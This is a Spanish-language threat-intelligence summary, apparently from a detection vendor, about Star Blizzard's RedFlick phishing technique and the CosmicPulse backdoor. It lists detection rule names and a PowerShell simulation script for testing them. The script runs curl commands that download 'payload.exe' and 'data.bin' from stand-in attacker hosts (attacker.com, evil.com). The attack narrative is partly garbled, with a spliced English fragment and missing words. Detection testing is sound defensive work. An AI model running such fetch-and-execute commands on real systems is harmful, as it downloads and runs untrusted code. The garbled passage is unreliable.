Star Blizzard utiliza RedFlick para mejorar el despliegue de phishing y malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El actor patrocinado por el estado ruso Star Blizzard ha evolucionado su técnica utilizando la técnica RedFlick para entregar la puerta trasera CosmicPulse. El actor ha cambiado de un phishing altamente dirigido a campañas de phishing automatizadas a mayor escala utilizando sitios web comprometidos. Estas campañas utilizan métodos de entrega sofisticados, incluidos archivos VHDX y cargas útiles ocultas dentro de archivos PDF para evadir la detección.
Investigación
Microsoft Threat Intelligence analizó diversas oleadas de phishing observadas a lo largo de 2026, identificando una transición de cadenas basadas en ClickFix a tareas programadas RedFlick. La investigación detalló un flujo de ejecución en múltiples etapas que involucran archivos LNK, ejecución de comandos locales SSH y el uso de WebDAV para la recuperación remota de cargas útiles. El análisis técnico también descubrió el uso de esteganografía y cifrado basado en el registro para la carga útil de CosmicPulse.
Mitigación
Las organizaciones deberían implementar autenticación resistente al phishing y políticas de acceso condicional para asegurar las identidades. La protección de endpoints debe configurarse con EDR en modo de bloqueo y protección antivirus en tiempo real habilitada. Además, implementar reglas de reducción de superficies de ataque puede prevenir la ejecución de scripts ofuscados y archivos ejecutables no autorizados.
Respuesta
Tras la detección, los equipos de seguridad deben utilizar EDR para remediar artefactos maliciosos e investigar intentos de inicio de sesión sospechosos. Los modos de investigación y remediación automatizada deben estar habilitados para reducir los tiempos de respuesta. Las organizaciones también deberían usar soluciones avanzadas contra phishing y purga automática de hora cero para neutralizar comunicaciones maliciosas entrantes.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
Línea de Comando Sospechosa Contiene Ruta UNC con Ejecutable como Argumento (vía línea de comandos)
Posible Descubrimiento de Recursos Compartidos de Red (vía línea de comandos)
Intentos Ocultos de Instalación Remota del Installer MsiExec Sospechoso (vía línea de comandos)
LOLBAS Conhost (vía línea de comandos)
Posible Uso de Herramienta de Tunelización [Windows] (vía línea de comandos)
Uso de CURL Sospechoso (vía línea de comandos)
Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía DNS)
IOC (HashSha256) para detectar: Star Blizzard refina el phishing y la entrega de malware con la técnica RedFlick
IOC (SourceIP) para detectar: Star Blizzard refina el phishing y la entrega de malware con la técnica RedFlick
IOC (DestinationIP) para detectar: Star Blizzard refina el phishing y la entrega de malware con la técnica RedFlick
Detecta Ejecución de PowerShell desde Descarga de PDF [Windows Powershell]
Detección de Técnica RedFlick de Star Blizzard – Tareas Programadas y Ejecución de Línea de Comando [Creación de Proceso de Windows]
Ejecución de Simulación
-
Narrativa del Ataque y Comandos: El adversario entrega un correo electrónico de phishing que contiene un enlace a un archivo malicioso. Al interactuar, se desencadena una secuencia donde
se utiliza para obtener una segunda etapa. Para integrarse con los procesos del sistema, el comando se diseña para incluir explícitamente los términosis utilized to fetch a secondary stage. To blend in with system processes, the command is crafted to explicitly include the termsPowerShell,PDF(referenciando la fuente del desencadenante), yconhost.exeen la cadena de línea de comando para coincidir con la lógica de la regla de detección del objetivo. El objetivo es ejecutar una carga útil decodificada incrustada dentro de una estructura PDF. -
Script de Prueba de Regresión:
# Script de simulación para activar la regla 'Detectar Ejecución de PowerShell desde Descarga de PDF'. # Este script construye una cadena de línea de comandos que incluye las cuatro palabras clave requeridas. $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF" $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe && PowerShell.exe -Command `& {Write-Host 'Extracting from PDF...'; Start-Process conhost.exe}" # Ejecutamos a través de cmd para asegurar que conhost.exe sea parte del árbol de procesos/contexto de comandos Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extracting from PDF... using conhost.exe`"" -
Comandos de Limpieza:
# Limpiar archivos generados durante la simulación Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue